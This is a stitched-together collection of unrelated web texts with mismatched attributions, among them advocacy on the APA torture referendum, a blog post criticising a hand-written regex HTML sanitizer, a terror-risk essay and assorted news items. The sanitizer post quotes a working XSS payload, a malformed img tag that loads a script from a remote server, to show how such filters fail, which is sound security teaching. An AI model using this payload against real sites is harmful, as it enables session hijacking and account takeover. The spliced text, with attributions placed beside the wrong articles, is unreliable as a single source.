Unlike other health professions , which have determined that participation in the interrogations is unethical , the APA leadership has defended psychologists ’ involvement in interrogations at Guantanamo and the CIA “ black sites . ”
Psychologist opponents of the APA position have , for the first time in APA history , organized a referendum to change APA policy .
They are asking the APA membership to reject psychologists ’ participation when such sites are in violation of international law or the Constitution .
The ballots are currently arriving in members mailboxes .
After reviewing the disturbing background of psychologists crucial role in U.S. torture and detainee abuse , the referendum ’s crucial clause states :
Be it resolved that psychologists may not work in settings where persons are held outside of , or in isolation of , either International law ( e.g. , the UN Convention Against Torture and the Geneva Conventions ) or the US Constitution ( where appropriate ) , unless they are working directly for the persons being detained or for an independent third party working to protect human rights .
Jean Maria Arrigo , the psychologist who served on the APA ’s PENS [ Psychological Ethics and National Security ] task force in 2005 and exposed the PENS report as a rubber stamp for an already determined government policy , has succinctly explained the importance of a “ Yes ” vote on the referendum :
The ballot arrived today from APA , and I just voted Yes on the Referendum .
To my mind , the timeliness of the Referendum as social action supersedes the problem of misinterpretation of the text .
My thinking on this matter has been most strongly influenced by military and intelligence personnel I know , including senior interrogators .
At an emotional level , I was much affected by audience responses to my February presentations to anti-torture symposia at two universities in Sao Paulo and the regional psychological association .
Audiences were outraged by the APA endorsement of psychologists at military interrogation centers ( people standing up and shouting ) and truly horrified that I had agreed to the PENS report .
( In Brazil , the word “ interrogation ” is virtually synonymous with “ torture . ” )
If the APA leadership accommodates current government policy on interrogations , well , Brazilian psychologists can understand … , but if the APA membership defeats the Referendum , at this point in our history , that sends a bad message I cannot explain away .
They are worried about the passivity of the APA legitimizing torture by our government , which legitimizes torture by their government and delegitimizes their own protests as psychologists .
Respectfully , Jean Maria Arrigo
In response to the rferendum , the APA has launched a strong effort to convince members that they should not support this “ well - intended ” referendum because it would restrict the ability of psychologists to work in domestic prisons and mental hospitals .
Although legally informed psychologists have opined that any such risk is extremely far fetched , the referendum authors have issued a clarifying statement that would put these concerns to rest for those sincerely concerned about the domestic application of the referendum :
This referendum is focused on settings such as Guantánamo Bay and the CIA ‘ black sites ’ set up by the U.S. as part of its ‘ global war on terror ’ ; settings where the persons being detained are denied the protections of either constitutional or international law , settings which have been denounced by the United Nations , the Council of Europe , and the International Committee of the Red Cross .
We are well aware of the harms and legal struggles facing certain prisons and jails inside the domestic U.S. criminal justice system .
However , the referendum takes no position on such settings where prisoners have full access to independent counsel and constitutional protections ; nor does the referendum take a position on settings that now exist within the domestic mental health system where clients and patients also possess these basic rights .
The campaign of confusion has , however , only intensified since this clarification was issued .
Psychologist and attorney Bryant Welch , who founded the organization ’s Practice Directorate and then served as its Executive Director for eight years , has himself penned a piece explaining what is at stake in this referendum [ included here with permission ] :
Vote to End the Shame APA has Inflicted on all Psychologists By Bryant L. Welch , J.D. , Ph.D .
In the eyes of the world psychologists are being seen as aiders and abettors of torture .
The damage to the profession grows day by day , and the shamefulness of it reflects on all of us , whether we like it or not .
This is the third consecutive annual convention in which APA has presented new reasons for refusing to explicitly state that psychologists are not to participate in detention centers where torture is being used .
In 2006 we were told , among many things , that torture was not occurring , and that it was sufficient for APA to reiterate its 1986 resolution “ opposing torture . ”
Last year we were told that psychologists ’ presence at the detention centers was actually necessary to prevent the torture whose very existence these same APA officials denied the previous year .
Bizarrely , APA outlawed nineteen specific forms of torture , as if in some way the large number of proscribed techniques would cripple torture efforts .
As a result , for the first time in APA history , APA rank and file members have secured the necessary signatures to petition the APA and force APA to submit the torture issue to a referendum by the membership .
Persisting in its support for psychologists ’ participation in Bush detention centers and appearing insensitive to the moral concerns of its members , APA leaders are now advising APA members to oppose the referendum because the language of the referendum might be interpreted to preclude psychologists working in certain institutional settings .
This argument is based on scenarios that are extremely far fetched and could readily be addressed even were they to occur .
To the public , of course , the message would be that psychologists are not willing to stop torture now if there is even a remote risk of losing jobs in the future .
Since the Bush Administration will be out of office by the next time APA meets , this will be the last opportunity psychologists will have to remove this terrible stain from our reputation and our history Torture is not a nuanced issue .
Vote
No to torture .
Vote YES on the referendum .
For more information see Why Did the American Psychological Association Do It ?.
Several nationally prominent and respected organizations which have long been active in the anti-torture struggle have spoken out in support of the referendum .
The Torture Abolition and Survivors Support Coalition International has issued this statement in support :
The Torture Abolition and Survivors Support Coalition International ( TASSC ) is an organization each of whose members is a survivor of torture .
Our mission is two - fold : to support torture survivors in any way we can and to oppose torture wherever it may be practiced .
We understand the petition submitted by Ethical APA Psychologists to be entirely consistent with this mission .
That such a petition is necessary seems , at the very least , distressing but since it is , we express our support for it and thank psychologists for this action .
In solidarity ,
Harold Nelson
Advocacy Coordinator
Torture Abolition and Survivors Support Coalition International ( TASSC ) www.tassc.org
School of the Americas Watch also has expressed support for the referendum :
We at School of the Americas Watch are all too familiar with the practice of institutional secrecy in which torture and brutality thrives .
We therefore recognize and support the vital role that Psychologists for Social Responsibility and Psychologists for an Ethical APA have played in the fight to end torture and other human rights abuses .
We further support Psychologists for an Ethical APA ’s petition and referendum with the American Psychological Association ( APA ) .
We urge the American Psychological Association to put an end to the unhealthy relationship between psychology and the torture by removing all APA psychologists from the secret detention centers where torture and cruelty prevail .
We stand in solidarity with all of those psychologists who are working to advance human rights throughout the world and who support survivors of torture .
Mike Baney
Operations and Development Coordinator
School of the Americas Watch , Washington , DC www.soaw.org
TASSC and School of the Americas Watch understand all too clearly what is at stake here .
Let ’s hope that , despite the campaign of confusion and fear , the members of the APA grasp this opportunity to heed the words of Drs. Welch and Arrigo and vote for this referendum .
This would send a strong message to those in the forefront of the anti-torture struggle — like TASSC and School of the Americas Watch — that psychologists will no longer give their tacit or active consent to torture and other detainee abuse .
Neither the profession nor the country can afford to miss this opportunity to issue a rebuke to the Bush administration and to those in our profession who have abetted it .
As Dr. Welch states : “ Vote No to torture .
Vote YES on the referendum . ”
I 'm often surprised by how common it is for developers to prefer reinventing the wheel to using off - the - shelf libraries when solving problems tasks .
This practice is n't limited to newbies who do n't know any better but also to experienced developers who should .
Experienced developers often make excuses about not wanting to take unnecessary dependencies or not trusting the code of others when justifying reinventing the wheel .
For example , take this conversation that flowed through my Twitter stream yesterday
The background on this conversation is that Jeff Atwood ( aka codinghorror ) recently decided to quit his job and create a new Website called stackoverflow.com .
It is a question and answer site for asking programming questions where users can vote on the best answers to specific questions .
You can think of it as Yahoo !
Answers but dedicated to programming questions .
You can read a review of the site by Michiel de Mare for more information .
Recently Jeff Atwood blogged about how he was planning to use regular expressions to sanitize HTML input on StackOverflow.com in his blog post entitled Regular Expressions : Now You Have Two Problems where he wrote
I 'd like to illustrate with an actual example , a regular expression I recently wrote to strip out dangerous HTML from input .
This is extracted from the SanitizeHtml routine I posted on RefactorMyCode .
var whitelist = @ " </?p>|< br\s ?/?>|</?b>|</?strong>|</?i>|</?em>|
</?s>|</?strike>|</?blockquote >|</?sub>|</?super >| </?h( 1|2|3 ) >|</? pre>|<hr\s ?/?>|</?code >|</?ul >|
</?ol >|</?li>|</a>|<a[ ^> ]+>|< img [ ^ > ]+/? > " ;
What do you see here ?
The variable name whitelist is a strong hint .
One thing I like about regular expressions is that they generally look like what they 're matching .
You see a list of HTML tags , right ?
Maybe with and without their closing tags ?
The problem Jeff was trying to solve is how to allow a subset of HTML tags while stripping out all other HTML so as to prevent cross site scripting ( XSS ) attacks .
The problem with Jeff 's approach which was pointed out in the comments by many people including Simon Willison is that using regexes to filter HTML input in this way assumes that you will get fairly well - formed HTML .
The problem with that approach which many developers have found out the hard way is that you also have to worry about malformed HTML due to the liberal HTML parsing policies of many modern Web browsers .
Thus to use this approach you have to pretty much reverse engineer every HTML parsing quirk of common browsers if you do n't want to end up storing HTML which looks safe but actually contains an exploit .
Thus to utilize this approach Jeff really should have been looking at using a full fledged HTML parser such as SgmlReader or Beautiful Soup instead of regular expressions .
It did n't take long for the users of StackOverflow.com to show Jeff the error of his ways as evidenced by his post Protecting Your Cookies : HttpOnly where he acknowledges his mistake as follows
So I have this friend .
I 've told him time and time again how dangerous XSS vulnerabilities are , and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection .
But will he listen ?
No .
He 's hard headed .
He had to go and write his own HTML sanitizer .
Because , well , how difficult can it be ?
How dangerous could this silly little toy scripting language running inside a browser be ?
As it turns out , far more dangerous than expected .
…
Imagine , then , the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges .
How did this happen ?
XSS , of course .
It all started with this bit of script added to a user 's profile page .
< img src= " " http://www.a.com/a.jpg<script type=text/javascript src= " http://1.2.3.4:81/xss.js " > " /><< img src= " " http://www.a.com/a.jpg</script> "
Through clever construction , the malformed URL just manages to squeak past the sanitizer .
The final rendered code , when viewed in the browser , loads and executes a script from that remote server .
The sad thing is that Jeff Atwood is n't the first nor will he be the last programmer to think to himself " It 's just HTML sanitization , how hard can it be ? " .
There are many lists of Top HTML Validation Bloopers that show tricky it is to get the right solution to this seemingly trivial problem .
Additionally , it is sad to note that despite his recent experience , Jeff Atwood still argues that he'd rather make his own mistakes than blindly inherit the mistakes of others as justification for continuing to reinvent the wheel in the future .
That is unfortunate given that is a bad attitude for a professional software developer to have .
Rolling your own solution to a common problem should be the last option on your list not the first .
Otherwise , you might just end up a candidate for The Daily WTF and deservedly so .
Now Playing : T - Pain - Cant Believe
It ( feat .
Lil Wayne )
George Eastman
House is the oldest photography museum in the world , housed in the former home of Mr. George Eastman , the so - called father of modern photography and founder of Eastman Kodak company .
The Museum is also one of the premiere centres of photographic conservation in the world .
You can imagine our delight when they decided to join The Commons on Flickr !
Their initial foray includes 3 sets :
The Chusseau - Flaviens collection depicts “ social and political figures and events throughout Europe and the colonial empires in the Near East and the Far East ” from the 1890s to just before World War I …
… Messrs . Southworth & Hawes were partners in commercial studio in Boston , primarily shooting daguerreotype portraits .
The studio opened in 1843 , and closed twenty years later …
… and a small selection of exquisite Autochromes , the first colour photographic process , invented by Auguste and Louis Lumière in 1904 .
In other news , Brooklyn Museum has just uploaded their next installment of their glorious Egyptian lantern slides , this time with a focus on people and life of the time .
We ’re also excited to be launching the ability to search across all the photos in The Commons !
Fuelled by your tagging and other descriptive commentary , we can now all bear witness to brand new emergent collections found only on Flickr , created by you .
Some favourites so far include blue and yellow , moustachioed men wearing ties and crowded streets .
Video Visits are available .
Many of our providers are now offering appointments via video .
Call to schedule today .
Afghanistan Akrotiri Albania Algeria American Samoa Andorra Angola Anguilla Antarctica Antigua and Barbuda Argentina Armenia Aruba Ashmore and Cartier Islands Australia Austria Azerbaijan Bahamas , The Bahrain Baker Island Bangladesh Barbados Bassas da India Belarus Belgium Belize Benin Bermuda Bhutan Bolivia Bonaire , Sint Eustatius , and Saba Bosnia and Herzegovina Botswana Bouvet Island Brazil British Indian Ocean Territory Brunei Bulgaria Burkina Faso Burma Burundi Cabo Verde Cambodia Cameroon Canada Cayman Islands Central African Republic Chad Chile China Christmas Island Clipperton Island Cocos ( Keeling ) Islands Colombia Comoros Congo ( Brazzaville ) Congo ( Kinshasa ) Cook Islands Coral Sea Islands Costa Rica Croatia Cuba Curaçao Cyprus Czech Republic Côte d’Ivoire Denmark Dhekelia Diego Garcia Djibouti Dominica Dominican Republic Ecuador Egypt El Salvador Equatorial Guinea Eritrea Estonia Ethiopia Europa Island Falkland Islands ( Islas Malvinas ) Faroe Islands Fiji Finland France French Guiana French Polynesia French Southern and Antarctic Lands Gabon Gambia , The Gaza Strip Georgia Germany Ghana Gibraltar Glorioso Islands Greece Greenland Grenada Guadeloupe Guam Guatemala Guernsey Guinea Guinea - Bissau Guyana Haiti Heard Island and McDonald Islands Honduras Hong Kong Howland Island Hungary Iceland India Indonesia Iran Iraq Ireland Isle of Man Israel Italy Jamaica Jan Mayen Japan Jarvis Island Jersey Johnston Atoll Jordan Juan de Nova Island Kazakhstan Kenya Kingman Reef Kiribati Korea , North Korea , South Kosovo Kuwait Kyrgyzstan Laos Latvia Lebanon Lesotho Liberia Libya Liechtenstein Lithuania Luxembourg Macau Macedonia Madagascar Malawi Malaysia Maldives Mali Malta Marshall Islands Martinique Mauritania Mauritius Mayotte Mexico Micronesia , Federated States of Midway Islands Moldova Monaco Mongolia Montenegro Montserrat Morocco Mozambique Namibia Nauru Navassa Island Nepal Netherlands New Caledonia New Zealand Nicaragua Niger Nigeria Niue Norfolk Island Northern Mariana Islands Norway Oman Pakistan Palau Palmyra Atoll Panama Papua New Guinea Paracel Islands Paraguay Peru Philippines Pitcairn Islands Poland Portugal Puerto Rico Qatar Reunion Romania Russia Rwanda Saint Barthelemy Saint Helena , Ascension , and Tristan da Cunha Saint Kitts and Nevis Saint Lucia Saint Martin Saint Pierre and Miquelon Saint Vincent and the Grenadines Samoa San Marino Sao Tome and Principe Saudi Arabia Senegal Serbia Seychelles Sierra Leone Singapore Sint Maarten Slovakia Slovenia Solomon Islands Somalia South Africa South Georgia and South Sandwich Islands South Sudan Spain Spratly Islands Sri Lanka Sudan Suriname Svalbard Swaziland Sweden Switzerland Syria Taiwan Tajikistan Tanzania Thailand Timor - Leste Togo Tokelau Tonga Trinidad and Tobago Tromelin Island Tunisia Turkey Turkmenistan Turks and Caicos Islands Tuvalu Uganda Ukraine United Arab Emirates United Kingdom United States Uruguay Uzbekistan Vanuatu Vatican City Venezuela Vietnam Virgin Islands , British Virgin Islands , U.S. Wake Island Wallis and Futuna West Bank Western Sahara Yemen Zambia Zimbabwe
Deutsch English Español Français Polski Português
Format HTML
Text
And this is where the scientists jump the tracks .
They have no way of knowing a dam in Idaho is in the dreams of terrorists , but there 's quite a bit of evidence , if they have taken the time to read materials from various terror trials , that it probably is not .
On the contrary , the evidence suggests that many jihadi terrorists , even if told about Lucky Peak Dam and the pitiful local emergency response , would n't know how to destroy such a considerable public work without extensive planning and access to demolition expertise and materials .
They 've shown no sign of such a capability since 9/11 .
Perhaps one could employ acetone peroxide bombs or drive one 's jeep into the entrance of the dam powerhouse , then set oneself afire ?
No such story on terror research is complete without someone asking if publicizing such a research paper as Piegorsch 's is a good idea .
" Some critics have questioned whether statistical research about America 's more vulnerable places should be so easily accessible ... " reported the Times .
" The bad guys have figured this out already , " claimed the head boffin , again showing that while he may know a lot about statistics , one could make the counter argument that the man greatly overestimates what " the bad guys " have figured out or can figure out .
Since 9/11 , this has been a common trope peddled by a broad variety of anti-terror experts .
The terrorists always have stuff figured out and when coupled with another canard , the one that states that it 's easy to carry out any kind of mayhem , one can begin to go about the job of assigning global fragilities and vulnerabilities without interference .
Terrorists ?
We got 'em
The Risk Analysis vulnerability study comes up with its selection of cities by relying on a terrorism database of incidents from 1970 - 2004 , created by the scientists from information on US terror compiled at two sources : the Terrorism Knowledge Base and the US Department of Justice .
A quick gander at the Terrorism Knowledge Base shows the US awash in terror incidents , almost all of them carried out by American crazies .
The great majority of these events are less terrifying than local gang crime in inner city USA .
In fact , in the last two years , arsonists motivated by the fire season in southern California have probably caused more property damage and suburban displacement than all of the terrorists in the US section of the TKB combined .
But disasters like wildfires and terror incidents are apples and oranges , eh ?
Indeed they are and a risk analysis can also evaluate which of the two a nation or society is more vulnerable to by employing common sense or the studious lack of it .
The latter has been shown to be something of the preferred analytical tool in the US during the last five years .
" To put this [ report ] into practical perspective , suppose city officials in ...
Charleston , SC , or Norfolk , VA , were considering new forms of coastal antiterrorist protection , " the authors write .
( One of their conclusions is that coastal cities in the eastern USA and on the Great Lakes trend higher in terror vulnerability . )
" This could motivate increased funding allocation ( s ) ... "
So an alternative interpretation is that it 's good business to have a bad score .
The paper also includes a map of US vulnerability to terror nicely color - coded in red ( bad ) , yellow ( caution ) and green ( OK ) .
Of course , since this is all now available on - line the terrorists have already downloaded it and someone in Karachi or Lahore must be making plans for where we least expect it , not Boise , but the previously thought to be terror - safe border between eastern California and western Nevada . ®
George Smith is a senior fellow at GlobalSecurity.org , a defense affairs think tank and public information group .
At Dick Destiny , he blogs his way through chemical , biological , and nuclear terror hysteria , often by way of the contents of neighbourhood hardware stores .
If you wish to reproduce any essays from this site :
You may reproduce our essays as long as you give proper attribution ( Washington 's Blog ) and provide a link to our site .
SÃO JOSÉ DOS CAMPOS , Brazil  Gilberto Câmara , a scientist who leads Brazil ’s national space agency , is more at ease poring over satellite data of the Amazon than being thrust into the spotlight .
But since January , Dr. Câmara has been at the center of a political tug - of - war between scientists and Brazil ’s powerful business interests .
It started when he and his fellow engineers released a report showing that deforestation of Brazil ’s portion of the rainforest seemed to have shot up again after two years of decline .
Since then , Dr. Câmara , who leads the National Institute for Space Research here , has found himself having to defend his agency ’s findings against one of Brazil ’s richest and most powerful men : Blairo Maggi , who is governor of the country ’s largest agricultural state , Mato Grosso , and a business owner known as the “ Soybean King . ”
Governor Maggi was exercised enough by the report  which led to harsh measures stifling business in his state  that he asked for , and was granted , a meeting with the president , Luiz Inácio Lula da Silva .
http://www.bushslastday.com/
For three years , a Bush - hating Vermont pipe carver has built a million - dollar business around the digits " 01.20.09 . "
On Jan. 20 , 2009 -- one year from today -- Elliot Nachwalter and his company , " Bush 's Last Day , " will have to find new inspiration .
That 's the day President George W. Bush leaves the White House .
" I have a couple little products lined up .
Both of them have nothing to do with politics , " Nachwalter said .
" I 'd like to think this time we wo n't have to do another end - of - term button . "
First doodled on a dining room table , then slapped onto lapel buttons , " 01.20.09 " has become wildly popular .
" It was like a bulb , a light went off , " said Nachwalter , who drew it in a fit of pique prompted by Bush 's refusal to sign a piece of environmental legislation .
" I started giving them out to my friends and anybody who thought it was interesting , and I could n't have enough of them .
I said ' Maybe I should think about selling them . ' "
Now , more than 600 businesses across the country sell the T - shirts , buttons , bumper stickers and other products that proclaim " 01.20.09 , " some with the subtext " Bush 's Last Day " and " Earth , Water , Air . "
The Internet has spread the message -- and the products -- globally .
" The Web site became like a cult thing .
Everybody would send it to their mailing list and things started to grow pretty rapidly , " Nachwalter said .
" 01.20.09 " has appeared in movies , on late - night television shows -- even on a Humvee in Iraq .
Meanwhile , " Bush 's Last Day " countdown key chains tick off the days , hours , minutes and seconds until Bush 's era ends at the White House .
Nachwalter started out in a closet , but quickly outgrew his space .
Now , he and six employees work 16 - hour days filling orders out of a Manchester industrial park .
The product line has grown as well .
There are refrigerator magnets , coffee mugs , golf balls , greeting cards , even " Fire Bush Hot Sauce " and dog treats called " Bush Biskits . "
Donna Tsitsikaos , a spokeswoman for America , a gift store chain with 17 retail outlets in the Washington , D.C. , area and New Jersey , said five of the chain 's best - selling products with political themes came from Bush 's Last Day .
America started selling the Bush 's Last Day key chains .
Now , it sells 12 Bush 's Last Day items .
" We 've been thrilled .
It 'll continue to be in our lineup through the rest of 2008 , " Tsitsikaos said .
" We 're hoping the company will come up with something creative after this product goes out of style . "
Renee Carl , a left - wing political activist from Washington , said she sees a lot of the " 01.20.09 " bumper stickers in her Washington neighborhood .
She has one on her refrigerator .
She has sent them as presents in birthday cards .
" We think everyone doing work thinking toward a new progressive administration is doing great work , " said Carl .
[ Via - Burlington Free Press ]
Rejected : $ 6 M Offer for Cricket.com
What 's in a domain name ?
Serious money
MySpace ( Unfairly ? )
Wins UK Domain Name
Domain king 's rivers of gold
Google may be the de facto leader in search today , but will its lead last forever ?
With services like Mahalo and Cuil gaining attention and Microsoft willing to pour continued billions into its quest for online dominance , Google 's rivals are legion , and they 're hungry , but that does n't mean the Big G needs to elevate its corporate blood pressure ; Google 's dominance is assured far into the future .
According to comScore 's latest figures , Google commanded 61.5 percent of the US search market , while Yahoo owned 20.9 percent and Microsoft trailed with 9.2 percent .
Both Ask.com and AOL follow far behind the big three .
And where are the hot startups ?
Smaller search engines like Mahalo , Powerset , and Quintura did n't even make the list .
Making room
A search engine can be an extremely lucrative endeavor when it 's popular .
But with Google , Yahoo , and Microsoft commanding more than 90 percent of the market , is it even possible anymore for a small company to be anything more than the nichest of niche players ?
The answer is " no " and the reason is simple : if a search service is good enough to make significant headway , deep - pocketed Google or Microsoft will acquire it before it even has a chance to hit the mainstream .
Case in point : Microsoft acquired Powerset just a few months ago to bolster its search business as it tries to live up to Ballmer 's lofty goals for the future of Live Search .
" I would say ' Hey , you know , you 're just three years old , ' " Ballmer said in response to a question asking him if Live Search needs to get its act together quickly .
" And we 've got you in there playing basketball with the 12 - year - olds , and you know what ?
You 're growing up quick , you 're getting better every day , and you 've got all the potential in the world .
If it takes you until you 're six , seven , eight , nine , ten — but you 're gonna dunk , and you 're gonna dunk every other guy some day . ' "
In its quest to dunk the ball in Google 's face , Microsoft has poured money into search for years .
In addition to acquiring Powerset , the company has repeatedly made improvements to its search function that included a complete overhaul and a quadrupled index size last year , and a more interactive homepage earlier this week .
With Powerset picked up , let 's consider other hot startups .
Mahalo has enjoyed some success of late , but human - powered search has significant limitations and , as the company points out , it needs to support the 25,000 most popular search terms to become a success .
Unfortunately , Mahalo's search function does n't really allow for tweaking search queries , which puts it at a significant disadvantage when people are looking for specific topics on a given subject .
Of course , Mahalo would argue that it 's trying to make search results easier and not force users to tweak , but as queries and users become more sophisticated , that 's increasingly difficult .
Cuil launched this week to much fanfare due to its claim to be the " biggest search engine on the Web " with an index of 120 billion pages ( three times more than Google and ten times more than Microsoft ) .
But after using it for a while , Ars quickly found that it failed to deliver the best and most relevant search results and it seemed to work well only with generic terms .
So if the three most prominent small search engines — Powerset , Mahalo , and Cuil — were either acquired or simply do n't have what it takes to supplant Google , can any search service truly compete , or is all that glorious ad revenue destined to wind up finding vegan cuisine , private party planes , and lava lamps at the Googleplex ?
Searching for the " Google Killer "
Some believe that since " Google it " has become such a ubiquitous phrase , name recognition alone makes it impossible to kill Google .
Mark Cuban contends that the only way to kill Google is to force it to deliver bad results by having major websites " recuse themselves from Google search results . "
But what popular website wants to cut off incoming links from Google ?
Google is synonymous with search in consumers ' minds , and pulling your site from Google 's index is the one thing most companies are desperate to avoid .
Yahoo and Microsoft search may be destinations , but they simply do n't command mainstream attention the way Google does .
Sure , Yahoo's search results may be more relevant in some cases and Microsoft 's service may be sleeker , but the vast majority of people use Google because its overall usability and relevance make it the best solution .
Smaller companies like Cuil and Mahalo might be trying something new , but in the search field , it comes down to whether or not they can provide an experience that easily eclipses Google 's ( emphasis on " easy " ) .
Do Mahalo's generic search results make it better than Google's ?
Does Cuil 's huge index even matter if it does n't provide you with the best search results on any number of generic or sophisticated queries ?
Status quo
No , chances are that for the foreseeable future , the search industry will stay much the same : three major companies will vie for control , but one will dominate the others like an NBA player at a YMCA pick - up game .
With Microsoft 's attempts at making Live Search just one key component of a broader online strategy that revolves around Live convergence , Microsoft hopes to attract more users to its search engine through its other products ( in a reverse of Google 's model ) .
And although it may be trudging through tumultuous times now , Yahoo is still the second most popular search engine in the US .
With its BOSS platform , Yahoo is looking to offer small search engines Yahoo search results , much like Clusty uses Google 's , and this may produce some interesting innovation .
But these moves alone make it abundantly clear that both Microsoft and Yahoo are trying to capitalize on areas that do n't matter nearly as much as they think .
Convergence is fine if you can get people to use your products .
Allowing other companies to use Yahoo search results seems like an obvious move , considering Google has been doing that for quite some time .
What about the search engine itself ?
Instead of making it more interactive , Microsoft should focus on making it more relevant .
And instead of maintaining the status quo , Yahoo should consider taking a cue from Google : make the search page all about search , remove the eyesores , and keep it simple .
Google did n't become the world 's most popular search engine by presenting distraction and complexity ; it won by being relevant , clean , and easy .
And with huge coffers of cash to acquire or invest in small companies that could make a big impact , Google is in a prime position to hold the top spot for years with nary a worry about competitors .
If Microsoft and Yahoo should learn anything from Google 's initial success , it 's that getting " rid " of users quickly is more important than keeping them searching .
Sure , it sounds counter - intuitive , but it worked for Google .
Virtual Library of Newspaper Articles
Woman who cut off her newborn son's private parts handed 5 - year prison term
Mainichi Daily News , Sakai , Osaka , Japan , November 26 , 2006
SAKAI , Osaka --
A woman accused of cutting off her newborn son's private parts in 2004 was ordered Monday to spend five years behind bars .
The Sakai branch of the Osaka District Court convicted Shizue Tamura , 27 , a resident of Izumi , Osaka Prefecture , of inflicting bodily injury .
" The way she committed the crime was unprecedented , inhumane and cruel , " Presiding Judge Masahiro Hosoi said as he handed down the ruling .
Prosecutors had demanded an eight - year prison term .
The judge dismissed the defendant 's not - guilty plea , pointing out that only she and her son were at home at the time of the incident .
However , he reduced her prison term to five years , considering her unhappy childhood and the fact that she was regularly abused by her common - law husband .
Tamura cut off part of the private parts of her second son , who was then 4 months old , at her home on March 1 , 2004 , leaving him with severe injuries that took seven months to heal and serious after - effects , according to the ruling .
The judge asserted that the defendant directed her anger with her common - law husband at her second son , pointing out that the man broke his promise to recognize her second son as his own son and to pay the costs of bringing up the victim .
( Mainichi )
By Phil Mercer
BBC News , Sydney
Australia 's coastal regions have been hit by man shortages
An analysis of new census figures has shown that Australia is suffering from an unprecedented " man drought " .
The statistics have revealed that there are almost 100,000 more females than males in Australia .
The problem is worse in the coastal cities , where women have moved seeking better jobs and lifestyles , while many men have gone overseas .
Thirty years ago Australia was with flush with men thanks to immigration policies that favoured males .
That position has been reversed because thousands of Australian men in their 20s and early 30s have gone overseas either to travel or to work .
It has caused a gender imbalance that is having far - reaching implications .
Town and country
Major cities in Australia now have concentrated groups of unattached women , along with dwindling numbers of the opposite sex .
Demographer Bernard Salt says the exodus of young men to foreign countries is leaving its mark .
" If you go into the United Arab Emirates census you 'll find there is around 12,000 Australians living in Dubai , mostly male , mostly in the 25 to 34 - year age group .
" Here is an example of one country that has drawn out a specific age demographic out of Australia which has contributed to the ' man drought ' . "
But the situation outside of the larger towns and cities is very different .
Vast numbers of women have abandoned the countryside seeking better jobs or education in metropolitan areas .
They have left behind communities overloaded with younger males .
In the town of Glenden in the northern state of Queensland there is one single female for every 23 men .
Demographers have compiled a so - called " Love Map " that shows how the various clusters of unattached men and women are distributed across the Australian continent .
Here are the Ruby and Rails related technical talks given at the O’Reilly Open Source Convention 2008 .
A PDF of the presentation is availble for each talk , but no video at this time .
This entry was posted on Monday , August 4th , 2008 at 9:49 pmand is filed under .
You can follow any responses to this entry through the RSS 2.0 feed .
You can leave a response , or trackback from your own site .
NEW ORLEANS ( Reuters ) -
Three years after Hurricane Katrina slammed into the Louisiana coast , New Orleans residents on Wednesday again faced the prospect of an evacuation as Tropical Storm Gustav loomed .
Not since Katrina and Hurricane Rita , which followed in its wake , have residents faced government orders to evacuate their homes and businesses .
Many are still struggling to rebuild their lives in a city famed for its jazz clubs and Mardi Gras festival .
On Wednesday , two days before the third anniversary of Katrina ’s August 29 , 2005 , landfall , Gustav drifted away from Haiti and the Dominican Republic after killing 22 people .
It could hit the U.S. Gulf Coast around Monday .
The storm was expected to strengthen to a hurricane over the Gulf ’s warm waters , and U.S. landfall could be anywhere from the Florida panhandle to Texas .
But Gustav ’s most likely track is directly toward New Orleans .
Louisiana Gov. Bobby Jindal put New Orleans residents on alert , saying evacuations could begin as early as Friday .
City officials said New Orleans Mayor Ray Nagin would order an evacuation if Gustav looked likely to come ashore with wind speeds over 111 miles per hour ( 178 kph ) -- a Category 3 hurricane or higher on the 5 - step Saffir - Simpson scale .
“ It ’s still too early to tell exactly what it ’s going to do , ” city emergency preparedness director Jerry Sneed said .
Nagin , the city ’s public face during Katrina and Rita , cut short his trip to the Democratic National Convention in Denver to return home .
THEY ASSUME RESPONSIBILITY
During Katrina and Rita , many city residents ignored mandatory evacuation orders and remained to guard their homes and businesses from looters .
Sneed said residents would not be physically forced to leave their homes during an evacuation order -- which would be given about 30 hours before the storm comes ashore .
But they assume responsibility if they stay , Sneed said .
Slideshow ( 3 images )
“ If a tree comes through the roof and buries them underneath there , they ’re going to be on their own , ” Sneed said .
Sneed said he was confident that floodgates and pumping stations that failed during the 2005 storms would bear up .
“ The citizens should not be worried about the flooding again , ” he said .
Slideshow ( 3 images )
Storm levees broke under the onslaught of Katrina in 2005 , flooding 80 percent of New Orleans and killing almost 1,500 people in the city and along the Gulf coast .
The hurricane caused at least $ 80 billion in wind and flood damage .
Some estimates put damages as high as $ 125 billion .
Jindal said he had activated the state ’s catastrophic action team and could declare a state of emergency as early as Thursday .
He also has put the Louisiana National Guard on alert .
Jindal , elected in October 2007 , is hoping to avoid heavy criticism that fell on his predecessor , Kathleen Blanco , for not reacting swiftly after Katrina .
Federal agencies and the New Orleans city government also faced the wrath of residents over their response to the disaster .
President George W. Bush himself was severely criticized for his role , including his initial decision to view the devastated city only from the air .
After Katrina , chaos broke out in New Orleans as stranded flood victims waited days for help .
Many residents who fled the hurricane have not returned .
Jindal said that if the threat continues , the state could make 700 buses available for assisted evacuations , which could begin on Friday for people who need help due to medical or other conditions .
Amtrak trains were standing by to move 7,000 elderly residents to safety , Sneed said .
Jupiter 's moon
Io floats above the cloudtops of Jupiter in this image captured January 1 , 2001 .
The image is deceiving : there are 350,000 kilometers - roughly 2.5 Jupiters - between Io and Jupiter 's clouds .
Io is about the size of our own moon ( NASA / JPL / University of Arizona )
Jupiter is in the news again , this time because its " Baby Red Spot " - a storm less than a year old - appears to have been swallowed up by the massive storm known as the Great Red Spot .
This is good occasion to share some of the best photographs of Jupiter and its larger system of rings and moons , as seen by various probes and telescopes over the past 30 years .
( 16 photos total
This image of Jupiter 's moon Europa rising above Jupiter was captured by the New Horizons spacecraft in February just after it passed Jupiter on its way to Pluto and the outer Solar System .
( NASA , Johns Hopkins U. APL , SWRI )
The gibbous phase of Jupiter 's moon Europa .
The robot spacecraft Galileo captured this image mosaic during its mission orbiting Jupiter from 1995 - 2003 .
Evidence and images from the Galileo spacecraft , indicated that liquid oceans might exist below the icy surface .
( Galileo Project , JPL , NASA ; reprocessed by Ted Stryk
This view of the icy surface of Jupiter 's moon , Europa , is a mosaic of two pictures taken by the Solid State Imaging system on board the Galileo spacecraft during a close flyby of Europa on February 20 , 1997 .
The area shown is about 14 kilometers by 17 kilometers ( 8.7 miles by 10.6 miles ) , and has a resolution of 20 meters ( 22 yards ) per pixel .
One of the youngest features seen in this area is the double ridge cutting across the picture from the lower left to the upper right .
